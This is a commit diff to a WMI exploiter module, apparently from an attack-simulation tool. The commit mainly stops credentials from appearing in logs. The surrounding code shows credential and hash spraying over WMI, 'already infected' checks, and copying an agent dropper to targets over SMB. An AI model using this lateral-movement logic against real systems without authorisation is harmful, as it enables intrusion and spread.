Agent: improve logging in wmiexec.py
This commit is contained in:
parent
af9736a8ea
commit
d7e222c8a8
|
@ -2,6 +2,7 @@ import logging
|
|||
import ntpath
|
||||
import socket
|
||||
import traceback
|
||||
from typing import List
|
||||
|
||||
from impacket.dcerpc.v5.rpcrt import DCERPCException
|
||||
|
||||
|
@ -26,25 +27,12 @@ class WmiExploiter(HostExploiter):
|
|||
|
||||
@WmiTools.dcom_wrap
|
||||
def _exploit_host(self):
|
||||
src_path = get_target_monkey(self.host)
|
||||
|
||||
if not src_path:
|
||||
logger.info("Can't find suitable monkey executable for host %r", self.host)
|
||||
return False
|
||||
|
||||
creds = self._config.get_exploit_user_password_or_hash_product()
|
||||
|
||||
for user, password, lm_hash, ntlm_hash in creds:
|
||||
password_hashed = self._config.hash_sensitive_data(password)
|
||||
lm_hash_hashed = self._config.hash_sensitive_data(lm_hash)
|
||||
ntlm_hash_hashed = self._config.hash_sensitive_data(ntlm_hash)
|
||||
creds_for_logging = (
|
||||
"user, password (SHA-512), lm hash (SHA-512), ntlm hash (SHA-512): "
|
||||
"({},{},{},{})".format(user, password_hashed, lm_hash_hashed, ntlm_hash_hashed)
|
||||
)
|
||||
logger.debug(
|
||||
("Attempting to connect %r using WMI with " % self.host) + creds_for_logging
|
||||
)
|
||||
creds_for_log = _get_credential_string([user, password, lm_hash, ntlm_hash])
|
||||
logger.debug(f"Attempting to connect to {self.host} using WMI with {creds_for_log}")
|
||||
|
||||
wmi_connection = WmiTools.WmiConnection()
|
||||
|
||||
|
@ -52,26 +40,21 @@ class WmiExploiter(HostExploiter):
|
|||
wmi_connection.connect(self.host, user, password, None, lm_hash, ntlm_hash)
|
||||
except AccessDeniedException:
|
||||
self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)
|
||||
logger.debug(
|
||||
("Failed connecting to %r using WMI with " % self.host) + creds_for_logging
|
||||
)
|
||||
logger.debug(f"Failed connecting to {self.host} using WMI")
|
||||
continue
|
||||
except DCERPCException:
|
||||
self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)
|
||||
logger.debug(
|
||||
("Failed connecting to %r using WMI with " % self.host) + creds_for_logging
|
||||
)
|
||||
logger.debug(f"Failed connecting to {self.host} using WMI")
|
||||
continue
|
||||
|
||||
except socket.error:
|
||||
logger.debug(
|
||||
("Network error in WMI connection to %r with " % self.host) + creds_for_logging
|
||||
)
|
||||
logger.debug(f"Network error in WMI connection to {self.host}")
|
||||
return False
|
||||
|
||||
except Exception as exc:
|
||||
logger.debug(
|
||||
("Unknown WMI connection error to %r with " % self.host)
|
||||
+ creds_for_logging
|
||||
+ (" (%s):\n%s" % (exc, traceback.format_exc()))
|
||||
f"Unknown WMI connection error to {self.host}: "
|
||||
f"{exc} {traceback.format_exc()}"
|
||||
)
|
||||
return False
|
||||
|
||||
|
@ -82,7 +65,7 @@ class WmiExploiter(HostExploiter):
|
|||
wmi_connection,
|
||||
"Win32_Process",
|
||||
fields=("Caption",),
|
||||
where="Name='%s'" % ntpath.split(src_path)[-1],
|
||||
where="Name='{0}'".format(self.options["dropper_target_path_win_64"]),
|
||||
)
|
||||
if process_list:
|
||||
wmi_connection.close()
|
||||
|
@ -90,11 +73,12 @@ class WmiExploiter(HostExploiter):
|
|||
logger.debug("Skipping %r - already infected", self.host)
|
||||
return False
|
||||
|
||||
# copy the file remotely using SMB
|
||||
downloaded_agent = self.agent_repository.get_agent_binary(self.host.os["type"])
|
||||
|
||||
remote_full_path = SmbTools.copy_file(
|
||||
self.host,
|
||||
src_path,
|
||||
self._config.dropper_target_path_win_32,
|
||||
downloaded_agent,
|
||||
self.options["dropper_target_path_win_64"],
|
||||
user,
|
||||
password,
|
||||
lm_hash,
|
||||
|
@ -153,3 +137,15 @@ class WmiExploiter(HostExploiter):
|
|||
return success
|
||||
|
||||
return False
|
||||
|
||||
|
||||
def _get_credential_string(creds: List) -> str:
|
||||
cred_strs = [
|
||||
(creds[0], "username"),
|
||||
(creds[1], "password"),
|
||||
(creds[2], "lm hash"),
|
||||
(creds[3], "nt hash"),
|
||||
]
|
||||
|
||||
present_creds = [cred[1] for cred in cred_strs if cred[0]]
|
||||
return ", ".join(present_creds)
|
||||
|
|
Loading…
Reference in New Issue